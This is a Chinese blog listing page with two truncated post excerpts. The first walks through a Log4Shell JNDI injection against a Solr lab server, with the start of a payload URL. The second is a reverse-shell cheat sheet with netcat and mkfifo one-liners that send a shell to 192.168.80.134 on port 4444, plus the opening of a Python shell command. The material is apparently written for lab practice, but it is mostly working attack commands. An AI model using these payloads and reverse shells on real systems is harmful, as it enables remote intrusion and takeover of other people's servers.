摘要: 1.启动漏洞环境 2.通过dnslog验证漏洞 先获取一个subdomain 3.可利用/admin/cores传参 4.构造payload 访问 http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java. 阅读全文
posted @ 2024-05-17 14:28 4A16 阅读(2) 评论(0) 推荐(0) 编辑
摘要: Nc反弹shell nc -e 192.168.80.134 /bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 4444>/tmp/f Python交互式shell python3 -c 'i 阅读全文
posted @ 2024-05-17 14:27 4A16 阅读(3) 评论(0) 推荐(0) 编辑